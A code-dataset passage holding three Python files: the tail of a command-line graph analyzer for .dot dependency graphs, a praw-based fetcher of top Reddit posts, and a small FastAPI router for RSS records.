int(graph.get_out_neighbours(vtx)[-1:])\n if child == vtx:\n if not branch:\n branch += BRANCH_END\n print(\"%s%svtx[%s]\" % (indent, BRANCH_END[:-2] + BRANCH_SELF, child),\n \"in:\", graph.vertex(child).in_degree(),\n \"out:\", out_degree,\n \"val:\", graph.vp.vertex_name[child])\n else:\n print_recursive(child, deg - 1, indent, BRANCH_END)\n\n print_recursive(vertex, degree)\n\n\ndef search_vertices(graph: Graph, search_str: str) -> set:\n \"\"\"\n Searches for nodes which contain the given search string (case sensitive).\n\n :param graph: the graph containing the nodes\n :param search_str: the string 
to search for in the node name\n :return: a set of the found vertices or a empty set\n \"\"\"\n vtx_list = []\n for vtx in graph.vertices():\n vtx_value = graph.vp.vertex_name[vtx]\n if vtx_value.find(search_str) != -1:\n vtx_list.append(vtx)\n return vtx_list\n\n\ndef find_hotspots_out(graph: Graph, top_length=0) -> list:\n \"\"\"\n Finds the top nodes with most outgoing connections to other nodes (\"hotspots\").\n\n :param graph: the graph containing the given nodes\n :param top_length: return the top N results or the top log2(graph_size)+1 if no parameter was given\n :return: a list of nodes with the top most connections\n \"\"\"\n if top_length <= 0:\n top_length = int(math.log2(len(graph.get_vertices()))) + 1 # use log2 to hold the result list small\n\n vtx_list = list(graph.vertices())\n vtx_list.sort(key=lambda vertex: vertex.out_degree(), reverse=True)\n del vtx_list[top_length:]\n\n return vtx_list\n\n\ndef find_hotspots_in(graph: Graph, top_length=0) -> list:\n \"\"\"\n Finds the top nodes with most ingoing connections to other nodes (\"hotspots\").\n\n :param graph: the graph containing the given nodes\n :param top_length: return the top N results or the top log2(graph_size)+1 if no parameter was given\n :return: a list of nodes with the top most connections\n \"\"\"\n if top_length <= 0:\n top_length = int(math.log2(len(graph.get_vertices()))) + 1 # use log2 to hold the result list small\n\n vtx_list = list(graph.vertices())\n vtx_list.sort(key=lambda vertex: vertex.in_degree(), reverse=True)\n del vtx_list[top_length:]\n\n return vtx_list\n\n\ndef print_cycles(graph: Graph):\n \"\"\"\n Check if graph is a directed acyclic graph (DAG).\n If this is not the case, all cycles in the graph are printed, together with a small statistic about cycle lengths.\n\n :param graph: input graph\n \"\"\"\n if is_DAG(graph):\n print(\"Graph is a DAG. 
No cycles found!\")\n return\n else:\n print(\"Graph is not a DAG.\")\n cycles = list(all_circuits(graph))\n cycles_by_length = dict()\n for c in cycles:\n if len(c) not in cycles_by_length:\n cycles_by_length[len(c)] = list()\n cycles_by_length[len(c)].append(c)\n\n print(\"Cycles:\")\n print()\n for i in sorted(cycles_by_length.keys()):\n for c in cycles_by_length[i]:\n print(c, end=\": \")\n print(graph.vp.vertex_name[c[0]], end=\"\")\n for v in c[1:]:\n print(\" -> {}\".format(graph.vp.vertex_name[v]), end=\"\")\n print()\n\n print()\n print(\"Found {} cycles in the graph.\".format(len(cycles)))\n print()\n print(\"Number of cycles by length:\")\n print(\"Length | #\")\n print(\"-------+---\")\n for i in sorted(cycles_by_length.keys()):\n print(\"{:>6} | {:<}\".format(i, len(cycles_by_length[i])))\n\n\ndef collect_subgraph_vertices(graph: Graph, root_idx: int) -> set:\n \"\"\"\n Collects all children and sub-children of an given node and return a set of its indices.\n In case of cyclic dependencies, the internal use of a `set` prevents a endless duplication of the nodes in the\n output.\n\n :param graph: the input graph\n :param root_idx: the root index of the sub-graph\n :return: a set with all node indices of the sub-graph\n \"\"\"\n vtx_set = set()\n\n def traverse_recursive(vtx: int):\n vtx_set.add(vtx)\n out_degree = graph.vertex(vtx).out_degree()\n if out_degree:\n for child in graph.get_out_neighbours(vtx):\n if child not in vtx_set and child != vtx: # ignore self references and cyclic dependencies\n traverse_recursive(child)\n\n traverse_recursive(root_idx)\n return vtx_set\n\n\nclass SelectionMode(Enum):\n ALL = 0\n INDEPENDENT = 1\n\n\ndef detect_subgraphs(graph: Graph, is_verbose=True, selection=SelectionMode.ALL):\n \"\"\"\n Detects sub-graphs in the given input graph.\n\n :param graph: the input graph\n :param is_verbose: prints output in human readable form or as raw vertex indices for automated processing/piping\n :param selection: the enum which defines the kind of sub-graphs to be printed\n `ALL`: all detected sub-graphs which may also contain further sub-graphs\n `INDEPENDENT`: only sub-graphs without any other sub-graphs in it\n \"\"\"\n indie_nodes = max_independent_vertex_set(graph)\n sub_roots = []\n for vtx in graph.vertices():\n # check if vertex is a subgraph-root and not a leave-node\n if not indie_nodes[vtx] and graph.vertex(vtx).out_degree() > 0:\n sub_roots.append(int(vtx))\n\n def find_related_sub() -> list:\n related_subgraphs_list = []\n for v in sub_roots:\n sub_children = collect_subgraph_vertices(graph, v)\n sub_children.remove(v) # remove root-node\n\n for sub_vtx in sub_roots:\n if sub_vtx in sub_children:\n related_subgraphs_list.append(v)\n break\n return related_subgraphs_list\n\n if is_verbose: # human readable output\n if selection == SelectionMode.ALL:\n print(\"Found %s sub-graphs:\" % len(sub_roots))\n for vtx in sub_roots:\n sub = collect_subgraph_vertices(graph, vtx)\n sub.remove(vtx) # remove root-node\n print(\"sub[%s]\" % vtx, \"has\", len(sub), \"children, val:\", graph.vp.vertex_name[vtx])\n\n for vtx_sub in sub_roots:\n if vtx_sub in sub:\n print(\"\\t - includes sub[%s]\" % vtx_sub, \" val:\", graph.vp.vertex_name[vtx_sub])\n\n elif selection == SelectionMode.INDEPENDENT:\n independent_sub_list = []\n related_sub_list = find_related_sub()\n for vtx in sub_roots:\n if vtx not in related_sub_list:\n independent_sub_list.append(vtx)\n print(\"Found %s independent sub-graphs:\" % len(independent_sub_list))\n for vtx in 
independent_sub_list:\n print(\"sub[%s]\" % vtx, \"val:\", graph.vp.vertex_name[vtx])\n\n else: # raw output which could be piped in shell\n if selection == SelectionMode.ALL:\n for vtx in sub_roots:\n print(\"%s \" % vtx, end=\"\")\n elif selection == SelectionMode.INDEPENDENT:\n related_sub_list = find_related_sub()\n for vtx in sub_roots:\n if vtx not in related_sub_list:\n print(\"%s \" % vtx, end=\"\")\n\n\ndef find_subgraphs(graph: Graph) -> dict:\n \"\"\"\n Searches in the given graph for sub-graphs. The root of an sub-graph is determined by the\n `max_independent_vertex_set()`-function provided by graph-tools.\n\n :param graph: the graph to search in for sub-graphs\n :return: a list of the found sub-graphs\n \"\"\"\n indie_nodes = max_independent_vertex_set(graph)\n reduced_list = filter(lambda v: False if indie_nodes[v] else True, graph.vertices())\n subgraph_dict = {}\n\n for vtx in reduced_list:\n filter_prop = graph.new_vertex_property(\"bool\")\n sub_set = collect_subgraph_vertices(graph, vtx)\n\n for child in sub_set:\n filter_prop.a[int(child)] = True\n\n subgraph = GraphView(graph, vfilt=filter_prop)\n\n # mark the root node with a different color\n subgraph.vp[\"root\"] = subgraph.new_vertex_property(\"bool\")\n subgraph.vp[\"root\"].a[int(vtx)] = True\n\n subgraph_dict[int(vtx)] = subgraph\n\n return subgraph_dict\n\n\ndef export_circle_diagram(graph: Graph, file_name: str):\n \"\"\"\n Exports the given graph into the `../out/`-directory as `.png`-file. Since this call may take a long time to\n compute, it should be used carefully.\n\n :param graph: the input graph\n :param file_name: the name of the exported *.svg-file\n \"\"\"\n if not os.path.isdir(DEFAULT_OUTPUT_DIR):\n os.mkdir(DEFAULT_OUTPUT_DIR)\n\n state = minimize_nested_blockmodel_dl(graph, deg_corr=True)\n draw_hierarchy(state, output=DEFAULT_OUTPUT_DIR + file_name + \".png\") # *.svg works as well\n\n\ndef export_subgraph(graph: Graph, sub_vtx: int, file_name: str):\n \"\"\"\n Exports the given sub-graph into the `../out/`-directory as `.svg`-file. Since this call may take a long time to\n compute, it should be used carefully.\n\n :param graph: the input graph\n :param sub_vtx: the root node of the sub-graph\n :param file_name: the name of the exported *.svg-file\n \"\"\"\n if not os.path.isdir(DEFAULT_OUTPUT_DIR):\n os.mkdir(DEFAULT_OUTPUT_DIR)\n\n sub = get_subgraph(graph, sub_vtx)\n pos = radial_tree_layout(graph, graph.vertex(sub_vtx))\n\n graph_draw(sub,\n pos=pos,\n vertex_fill_color='#8ae234cc', # rrggbbaa\n vertex_shape=\"square\",\n vertex_text=sub.vp.vertex_name,\n output=DEFAULT_OUTPUT_DIR + file_name + \".svg\")\n\n\ndef get_subgraph(graph: Graph, sub_vtx) -> GraphView:\n \"\"\"\n Gets the given sub-graph from the source graph and stores the result in a new `GraphView` object. This function\n can be used recursive on it's self.\n\n :param graph: the input graph\n :param sub_vtx: the root node of the sub-graph\n :return: a new `GraphView` with the children of the given sub-graph\n \"\"\"\n sub_set = collect_subgraph_vertices(graph, sub_vtx)\n filter_prop = graph.new_vertex_property(\"bool\")\n for vtx in graph.vertices():\n if vtx in sub_set:\n filter_prop.a[int(vtx)] = True\n\n return GraphView(graph, vfilt=filter_prop)\n\n\ndef list_shared_sub_vertices(graph: Graph, vtx_a: int, vtx_b: int) -> list:\n \"\"\"\n Creates a list with all common shared vertices between two sub-graphs including the root-vertex. Thereby all\n children of each sub-graph where collected and matched against each other. 
If there is no match, an empty list is\n    returned.\n\n    :param graph: the input graph\n    :param vtx_a: the first root-vertex of a sub-graph\n    :param vtx_b: the second root-vertex of a sub-graph\n    :return: a list with all common shared vertex indices or an empty list\n    \"\"\"\n    sub_set_a = collect_subgraph_vertices(graph, vtx_a)\n    sub_set_b = collect_subgraph_vertices(graph, vtx_b)\n    shared_vertex_list = []\n\n    for vtx in sub_set_a:\n        if vtx in sub_set_b:\n            shared_vertex_list.append(vtx)\n\n    return shared_vertex_list\n\n\ndef exclude_nodes(graph: Graph, excluding_vertex_list: list) -> GraphView:\n    \"\"\"\n    Removes the given nodes (vertices) from the source graph and stores the result in a new `GraphView`-object. If\n    a removed node has children, all the children and their sub-children get removed as well.\n\n    :param graph: the input graph\n    :param excluding_vertex_list: a list with all vertices which should be excluded\n    :return: a new `GraphView` without the vertices of the given list\n    \"\"\"\n    filter_prop = graph.new_vertex_property(\"bool\")\n    for vtx in graph.vertices():\n        if vtx not in excluding_vertex_list:\n            filter_prop.a[int(vtx)] = True\n\n    return GraphView(graph, vfilt=filter_prop)\n\n\ndef exclude_subgraph(graph: Graph, sub_vtx) -> GraphView:\n    \"\"\"\n    Removes the given sub-graph from the source graph and stores the result in a new `GraphView` object. This function\n    can be applied recursively to its own output.\n\n    :param graph: the input graph\n    :param sub_vtx: the root node of the sub-graph\n    :return: a new `GraphView` without the children of the given sub-graph (the sub-graph root-node is kept)\n    \"\"\"\n    sub_set = collect_subgraph_vertices(graph, sub_vtx)\n    filter_prop = graph.new_vertex_property(\"bool\")\n    filter_prop.a[int(sub_vtx)] = True  # keep the root-vertex of the sub-graph\n    for vtx in graph.vertices():\n        if vtx not in sub_set:\n            filter_prop.a[int(vtx)] = True\n\n    out_graph = GraphView(graph, vfilt=filter_prop)\n    return out_graph\n\n\ndef export_graph(graph: Graph, out_file=\"\"):\n    \"\"\"\n    Exports the given `Graph` or `GraphView`-object into a *.gt-file.\n\n    :param graph: the `Graph` or `GraphView`-object to export\n    :param out_file: the file name or a timestamp on default\n    \"\"\"\n    if not out_file:\n        out_file = strftime(\"%Y-%m-%d_%H:%M:%S\", gmtime())  # use timestamp as default file name\n\n    if not os.path.isdir(DEFAULT_OUTPUT_DIR):\n        os.mkdir(DEFAULT_OUTPUT_DIR)\n\n    graph.save(DEFAULT_OUTPUT_DIR + out_file + \".gt\")\n\n\ndef nodes_connected(graph: Graph, nodes: list):\n    \"\"\"\n    Check whether the given list of nodes is connected in the graph.\n    For this, the shortest paths between all node combinations are collected.\n    Afterwards, it is checked if those paths are all connected.\n    Returns true/false.\n\n    :param graph: the input graph\n    :param nodes: list of node IDs or node names\n    :return: true if all nodes are connected, false otherwise\n    \"\"\"\n    # Convert all node names in the list to vertices:\n    node_names = [n for n in nodes if not n.isdigit()]\n    node_vertices = [graph.vertex(int(n)) for n in nodes if isinstance(n, int) or n.isdigit()]\n    for vtx in graph.vertices():\n        if graph.vp.vertex_name[vtx] in node_names:\n            node_names.remove(graph.vp.vertex_name[vtx])\n            node_vertices.append(vtx)\n    if node_names:  # any names still in this list were not found in the graph\n        print(\"Warning: The following node names could not be found in the graph and will be ignored:\", node_names)\n\n    # Filter graph by input nodes and the shortest paths between them:\n    vprop_filter = graph.new_vertex_property(\"bool\")\n    eprop_filter =
graph.new_edge_property(\"bool\")\n for v in node_vertices:\n vprop_filter[v] = True\n for (a, b) in itertools.product(node_vertices, node_vertices):\n v_list, e_list = shortest_path(graph, a, b)\n for v in v_list:\n vprop_filter[v] = True\n for e in e_list:\n eprop_filter[e] = True\n graph_filtered = GraphView(graph, vfilt=vprop_filter, efilt=eprop_filter)\n\n # Check if the graph only consists of one graph\n return bool(len(list(UnconnectedGraphs(graph_filtered))) == 1)\n\n\ndef group(graph: Graph, group_val: str, vtx_group: list) -> GraphView:\n \"\"\"\n Merges the given group of nodes together into one head-node. The nodes in the group-list getting removed\n afterwards, so only the new head-node and the edges from/to the nodes outside of the group remain in the graph.\n\n :param graph: the input graph\n :param group_val: the value/name of the new head-vertex\n :param vtx_group: the list of vertices which get merged into the head-vertex\n :return: a new `GraphView` with the given vertices grouped together\n \"\"\"\n group_head = graph.add_vertex() # create new head-vertex for the group\n graph.vp.vertex_name[group_head] = group_val # assign a value/name to the new head-vertex\n\n # collect all outgoing connections from the group\n out_set = set()\n for vtx in vtx_group:\n for out_vtx in graph.get_out_neighbours(vtx):\n if out_vtx not in vtx_group:\n out_set.add(out_vtx)\n\n # collect all incoming connections from the group\n in_set = set()\n for vtx in vtx_group:\n for in_vtx in graph.get_in_neighbours(vtx):\n if in_vtx not in vtx_group:\n in_set.add(in_vtx)\n\n # let the group-head take over outgoing connections\n for o in out_set:\n graph.add_edge(group_head, o)\n\n # let the group-head take over the incoming connections\n for i in in_set:\n graph.add_edge(i, group_head)\n\n # filter out grouped vertices\n filter_prop = graph.new_vertex_property(\"bool\")\n for vtx in graph.vertices():\n if vtx not in vtx_group:\n filter_prop.a[int(vtx)] = True\n\n return GraphView(graph, vfilt=filter_prop)\n\n\ndef parse_node_values(graph: Graph, vertex_values: list) -> list:\n \"\"\"\n Matches the given value list with the nodes in the input graph and returns the found indices as list.\n This routine is supposed to be a comfort utility function to take nearly every input and translates it into a\n processable output list, whether the input is a list of strings and/or already synthesized indices. If numbers are\n given in the input list, they get interpreted as vertex indices and therefore get bypassed directly into the\n resulting list. If necessary, Numbers could be escaped as string with a leading dot (e.g. `.5`).\n\n :param graph: the input graph\n :param vertex_values: list with indices node values to match\n :return: a list with the found node indices or a empty list if no vertex index form the input list was given and no\n string match was found\n \"\"\"\n node_indices = []\n for val in vertex_values:\n if val.isdigit():\n node_indices.append(val)\n else:\n if val[0] == '.':\n val = val[1:]\n\n was_found = False\n for vtx in graph.vertices():\n vtx_value = graph.vp.vertex_name[vtx]\n if vtx_value == val:\n node_indices.append(vtx)\n was_found = True\n break\n\n if not was_found:\n print(\"Could not find Node '%s'. 
Omit value.\" % val)\n\n return node_indices\n\n\ndef add_parent(graph: Graph, parent_val: str, vtx_group: list) -> GraphView:\n \"\"\"\n Adds a new node to the graph and assigns it to the given vertices as another parent node.\n\n :param graph: the input graph\n :param parent_val: the value/name of the new parent node\n :param vtx_group: the vertices which become assigned to the new parent\n :return: a new `GraphView` with the new parent node assigned to the given vertices\n \"\"\"\n parent_node = graph.add_vertex() # create new parent-vertex for the group\n graph.vp.vertex_name[parent_node] = parent_val # assign a value/name to the new parent-vertex\n\n # assign the node as a parent to the group\n for vtx in vtx_group:\n graph.add_edge(parent_node, vtx)\n\n return GraphView(graph)\n\n\ndef main(argv):\n \"\"\"\n Main function which parses the passed arguments.\n\n :param argv: the argument list passed by the command line\n \"\"\"\n parser = argparse.ArgumentParser(description=\"A program to analyse and explore large *.dot files.\")\n parser.add_argument('file', type=str, metavar='FILE')\n parser.add_argument('-c', '--children', nargs=1, metavar='NODE_ID|NODE_NAME',\n help=\"Print the Node and its (sub-)children.\")\n parser.add_argument('-p', '--print', nargs='+', metavar='NODE_IDs|NODE_NAMEs',\n help=\"Print some details about the given node(s).\")\n parser.add_argument('-s', '--search', type=str, nargs='+', metavar='SEARCH_STR', help=\"Search for the given node.\")\n parser.add_argument('-t', '--top', action='store_true',\n help=\"Find the top nodes with the most connections (hotspots).\")\n parser.add_argument('--cycles', action='store_true', help=\"Find and print cycles in graph.\")\n parser.add_argument('--nodes-connected', type=str, nargs='+', metavar='NODE_ID',\n help=\"Check if a list of nodes (id, name) have a connection in the graph. Connections may be \"\n \"indirect, e.g. with other nodes in between. Outputs yes/no.\")\n parser.add_argument('-ss', '--subgraphs', action='store_true',\n help=\"Searches and outputs all sub-graphs from the main graph.\")\n parser.add_argument('-sis', '--independent-subgraphs', action='store_true',\n help=\"Searches and lists all independent sub-graphs (sub-graphs without any other sub-graphs \"\n \"in it).\")\n parser.add_argument('--shared', nargs=2, metavar='NODE_ID|NODE_NAME',\n help=\"Lists all common shared vertices of two sub-graphs.\")\n parser.add_argument('-en', '--exclude-nodes', nargs='+', metavar='NODE_IDs|NODE_NAMEs',\n help=\"Excludes the given nodes (and their children) and exports the remaining graph as\"\n \"*.gt-file.\")\n parser.add_argument('-es', '--exclude-subgraphs', nargs='+', metavar='SUB_ROOT_NODE_IDs|SUB_ROOT_NODE_NAMEs',\n help=\"Excludes the given sub-graphs (without root node) and exports the remaining graph as \"\n \"*.gt-file.\")\n parser.add_argument('-r', '--raw', action='store_true',\n help=\"Enable raw output format for further automated processing or piping. This option is \"\n \"supported by '--search', '--children', '--subgraphs', '--independent-subgraphs', \"\n \"'--shared'.\")\n parser.add_argument('--group', nargs='+', metavar=('GROUP_NODE_NAME', 'NODE_IDs|NODE_NAMEs'),\n help=\"Merges the given list of node IDs together into one group-node.\")\n parser.add_argument('--outfile', type=str, nargs=1, metavar='FILE-NAME',\n help=\"Option to set a specific file name for a exported file. 
This option works in combination \"\n \"with '--exclude-nodes', '--exclude-subgraphs', '--group', '--export-subgraph'.\")\n parser.add_argument('--add-parent', nargs='+', metavar=('PARENT_NODE_NAME', 'NODE_IDs|NODE_NAMEs'),\n help=\"Adds a new parent node to the given nodes.\")\n parser.add_argument('--export-subgraph', nargs=1, metavar='NODE_ID|NODE_NAME',\n help=\"Exports the given sub-graph into a *.svg-file.\")\n parser.add_argument('--export-circle-diagram', action='store_true',\n help=\"Exports the dependencies of the graph as a circle diagram.\")\n\n args = parser.parse_args()\n\n if not args.file:\n print(HELP_INFO_MSG)\n sys.exit(1)\n else:\n graph = load_graph(args.file)\n\n if args.children:\n node = parse_node_values(graph, args.children)\n if len(node) != 1:\n print(\"Error: Could not find required node.\")\n sys.exit(1)\n if args.raw:\n for vtx in collect_subgraph_vertices(graph, node[0]):\n print(\"%s \" % vtx, end=\"\")\n else:\n print_vertex_children(graph, node[0], 3)\n\n if args.print:\n nodes = parse_node_values(graph, args.print)\n for vtx in nodes:\n print_graph_vertex(graph, vtx)\n\n if args.search:\n for search_str in args.search:\n vertex_set = search_vertices(graph, search_str)\n\n if args.raw:\n for vtx in vertex_set:\n print(\"%s \" % vtx, end=\"\")\n else:\n list_len = len(vertex_set)\n if list_len:\n print(\"Found %d results for '%s':\" % (list_len, search_str))\n for vtx in vertex_set:\n vtx_value = graph.vp.vertex_name[vtx]\n print(\"vertex[%s]\" % int(vtx), vtx_value)\n else:\n print(\"No results found for '%s'.\" % search_str)\n\n if args.top:\n i = 1\n vertex_list = find_hotspots_out(graph)\n print(\"Top out-degree nodes:\")\n for vtx in vertex_list:\n print(\"%d.\" % i,\n \"vtx[%d]\" % vtx,\n \"in:\", vtx.in_degree(),\n \"out:\", vtx.out_degree(),\n \"val:\", graph.vp.vertex_name[vtx])\n i += 1\n\n i = 1\n vertex_list = find_hotspots_in(graph)\n print(\"Top in-degree nodes:\")\n for vtx in vertex_list:\n print(\"%d.\" % i,\n \"vtx[%d]\" % vtx,\n \"in:\", vtx.in_degree(),\n \"out:\", vtx.out_degree(),\n \"val:\", graph.vp.vertex_name[vtx])\n i += 1\n\n if args.cycles:\n print_cycles(graph)\n\n if args.subgraphs:\n detect_subgraphs(graph, not args.raw, SelectionMode.ALL)\n\n if args.shared:\n nodes = parse_node_values(graph, args.shared)\n if len(nodes) != 2:\n print(\"Error: Could not find required node for comparison.\")\n sys.exit(1)\n\n shared_vtx_list = list_shared_sub_vertices(graph, nodes[0], nodes[1])\n if args.raw:\n for vtx in shared_vtx_list:\n print(\"%s \" % vtx, end=\"\")\n else:\n print(\"Shared vertices:\")\n print(shared_vtx_list)\n\n if args.independent_subgraphs:\n detect_subgraphs(graph, not args.raw, SelectionMode.INDEPENDENT)\n\n if args.exclude_subgraphs:\n nodes = parse_node_values(graph, args.exclude_subgraphs)\n sub = graph\n for sub_vtx in nodes:\n sub = exclude_subgraph(sub, sub_vtx)\n\n print(\"Excluded %d sub-graphs\" % len(nodes))\n if args.outfile:\n export_graph(sub, args.outfile[0])\n else:\n export_graph(sub)\n\n if args.exclude_nodes:\n nodes = parse_node_values(graph, args.exclude_nodes)\n out_graph = exclude_nodes(graph, nodes)\n print(\"Excluded %d nodes\" % len(nodes))\n if args.outfile:\n export_graph(out_graph, args.outfile[0])\n else:\n export_graph(out_graph)\n\n if args.nodes_connected:\n if nodes_connected(graph, args.nodes_connected):\n print(\"yes\")\n else:\n print(\"no\")\n\n if args.group:\n if len(args.group) <= 1:\n print(\"Too few arguments for '--group'. 
Expected (str, int|str, ...).\")\n print(HELP_INFO_MSG)\n sys.exit(1)\n\n if args.group[0].isdigit():\n print(\"Group name as to be a string. \"\n \"If you really want a number as group name, put a dot in front of it (e.g. '.5') to escape it.\")\n print(HELP_INFO_MSG)\n sys.exit(1)\n else:\n if args.group[0][0] == '.': # escape number as string\n group_name = args.group[0][1:]\n else:\n group_name = args.group[0]\n\n vtx_list = parse_node_values(graph, args.group[1:])\n\n if args.outfile:\n export_graph(group(graph, group_name, vtx_list), args.outfile[0])\n else:\n export_graph(group(graph, group_name, vtx_list))\n\n if args.add_parent:\n if len(args.add_parent) <= 1:\n print(\"Too few arguments for '--add-parent'. Expected (str, int|str, ...).\")\n print(HELP_INFO_MSG)\n sys.exit(1)\n\n if args.add_parent[0].isdigit():\n print(\"Parent name has to be a string. \"\n \"If you really want a number as parent name, put a dot in front of it (e.g. '.5') to escape it.\")\n print(HELP_INFO_MSG)\n sys.exit(1)\n else:\n if args.add_parent[0][0] == '.': # escape number as string\n parent_name = args.add_parent[0][1:]\n else:\n parent_name = args.add_parent[0]\n\n vtx_list = parse_node_values(graph, args.add_parent[1:])\n\n if args.outfile:\n export_graph(add_parent(graph, parent_name, vtx_list), args.outfile[0])\n else:\n export_graph(out_graph)\n\n if args.export_subgraph:\n node = parse_node_values(graph, args.export_subgraph)\n\n if args.outfile:\n export_subgraph(graph, node[0], args.outfile[0])\n else:\n export_subgraph(graph, node[0], \"sub\" + str(node))\n\n if args.export_circle_diagram:\n if args.outfile:\n export_circle_diagram(graph, args.outfile[0])\n else:\n export_circle_diagram(graph, \"circle_diagram\")\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"Waldleufer/archproj-bmwteam","sub_path":"src/graph_analyzer.py","file_name":"graph_analyzer.py","file_ext":"py","file_size_in_byte":30775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8322629521","text":"import praw\nfrom requests import Session\nimport pathlib\nimport pandas as pd\nfrom datetime import datetime, timedelta\n\n\nclass GetRedditInfo:\n \"\"\"\n Get Reddit info from specified subreddits\n - subreddits: list of subreddits to check\n - credentials: dict of needed credentials:\n - client_id\n - client_secret\n - password\n - exclude (default None): list of URLs to exclude, ie. 
no articles from Breitbart\n - use_ratio (default False): upvotes / (active users).\n Designed to account for subreddit size.\n Results will be ranked by ratio, high to low\n - timeframe (default 1): amount of days back to go\n - amount (default 10): number of articles to return\n \"\"\"\n\n def __init__(self, subreddits, credentials, exclude=None, use_ratio=False, timeframe=1, amount=10):\n self.subreddits = subreddits\n self.credentials = credentials\n self.exclude = []\n for item in exclude:\n # adding dot so it only excludes URL domain\n self.exclude.append(item + '.')\n self.use_ratio = use_ratio\n self.timeframe = timeframe\n self.amount = amount\n\n self.__top_articles = {}\n\n # initialise session\n self.session = Session()\n self.session.verify = pathlib.Path(credentials['pem_file_loc'])\n self.reddit = praw.Reddit(client_id=credentials['client_id'],\n client_secret=credentials['client_secret'],\n password=credentials['password'],\n user_agent=credentials['user_agent'],\n username=credentials['username'])\n\n def __order_results(self, data, headers, column_to_order, dt_column):\n \"\"\"Reorder results\"\"\"\n df = pd.DataFrame(data)\n df.columns = headers\n\n # filter out posts more than timeframe days back\n timeback = (datetime.now() - timedelta(days=self.timeframe)).strftime(\"%Y-%m-%d %H:%M:%S\")\n df = df[(df[dt_column] >= f'{timeback}')]\n\n # sort output\n df.sort_values(by=[column_to_order])\n\n # return the amount requested\n return df.head(self.amount)\n\n def get_subscribers(self, subreddit):\n \"\"\"Get amount of subscribers in a subreddit\"\"\"\n try:\n subs = self.reddit.get(f'/r/{subreddit}/about.json').subscribers\n if subs is None or subs == 0:\n raise ValueError(f\"Cannot get subscribers from {subreddit}\")\n except Exception as e:\n raise ValueError(f\"Cannot get subscribers from {subreddit}\\n{e}\")\n else:\n return subs\n\n def get_top_articles(self, pd_dataframe=True):\n \"\"\"\n Get the top articles from list of subreddits\n Returns ordered pandas dataframe (default) by score descending or else list of lists\n for ratio_score true:\n Returns pandas dataframe or list of lists containing:\n - title\n - subreddit\n - score\n - ratio\n - id\n - url\n - comms_num\n - created\n - body\n for ratio_score false:\n Returns pandas dataframe containing:\n - title\n - subreddit\n - score\n - id\n - url\n - comms_num\n - created\n - body\n \"\"\"\n if self.use_ratio:\n results = []\n column_headers = [\"title\", \"subreddit\", \"score\", \"ratio\", \"id\", \"url\", \"comms_num\", \"created\", \"body\"]\n for subreddit in self.subreddits:\n sub = self.reddit.subreddit(subreddit)\n subscriber_amount = self.reddit.get(f'/r/{subreddit}/about.json').subscribers\n\n # add 25 in the event of links being excluded\n top_posts = sub.hot(limit=self.amount + 25)\n\n for post in top_posts:\n # skip if url in excluded list\n if any(x in post.url for x in self.exclude):\n continue\n\n # apply ratio_score\n ratio = post.score / subscriber_amount\n results.append([post.title,\n post.subreddit,\n post.score,\n ratio,\n post.id,\n post.url,\n post.num_comments,\n datetime.fromtimestamp(post.created),\n post.selftext])\n final = self.__order_results(results, column_headers, 'ratio', 'created')\n else:\n results = []\n column_headers = [\"title\", \"subreddit\", \"score\", \"id\", \"url\", \"comms_num\", \"created\", \"body\"]\n for subreddit in self.subreddits:\n sub = self.reddit.subreddit(subreddit)\n\n # add 25 in the event of links being excluded\n top_posts = sub.hot(limit=self.amount + 
25)\n\n                for post in top_posts:\n                    # skip if url matches an excluded domain\n                    if any(x in post.url for x in self.exclude):\n                        continue\n\n                    results.append([post.title,\n                                    post.subreddit,\n                                    post.score,\n                                    post.id,\n                                    post.url,\n                                    post.num_comments,\n                                    datetime.fromtimestamp(post.created),\n                                    post.selftext])\n            final = self.__order_results(results, column_headers, 'score', 'created')\n        if pd_dataframe:\n            # return dataframe\n            return final\n        else:\n            # return list of lists\n            return final.values.tolist()\n","repo_name":"niallgorithm/email-trending","sub_path":"email-trending/redditinfo.py","file_name":"redditinfo.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"72960033080","text":"from typing import List, Optional\n\nfrom fastapi import Depends, FastAPI, HTTPException, Query\nfrom sqlalchemy.orm import Session\n\nfrom route_class import TimedRoute, APIRouter\nfrom . import crud, models, schemas\nfrom .database import SessionLocal, engine\n\nmodels.Base.metadata.create_all(bind=engine)\n\nrouter = APIRouter(route_class=TimedRoute)\n\n\n# Dependency\ndef get_db():\n    db = SessionLocal()\n    try:\n        yield db\n    finally:\n        db.close()\n\n\n@router.post(\"/rss/\", response_model=schemas.Rss)\ndef create_rss(srtdesc: str = Query(..., min_length=3), rss: schemas.RssBase = None, db: Session = Depends(get_db)):\n    db_rss = crud.get_rss_by_id(db, srtdesc=srtdesc)\n    if db_rss:\n        raise HTTPException(status_code=400, detail=\"This rss already registered\")\n    rss = rss.dict()\n    rsscreate = schemas.RssCreate(**{**rss, \"srtdesc\": srtdesc})\n    return crud.create_rss(db=db, rss=rsscreate)\n\n\n@router.get(\"/rss/\", response_model=List[schemas.Rss])\ndef read_rss(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):\n    rss = crud.get_rsses(db, skip=skip, limit=limit)\n    return rss\n\n@router.get(\"/rss/{rss_id}\", response_model=schemas.Rss)\ndef read_rss_by_id(rss_id: int, db: Session = Depends(get_db)):\n    db_rss = crud.get_rss(db, rss_id=rss_id)\n    if db_rss is None:\n        raise HTTPException(status_code=404, detail=\"Rss not found\")\n    return db_rss","repo_name":"IanVzs/WindWhisper","sub_path":"rss_app/rss_app.py","file_name":"rss_app.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
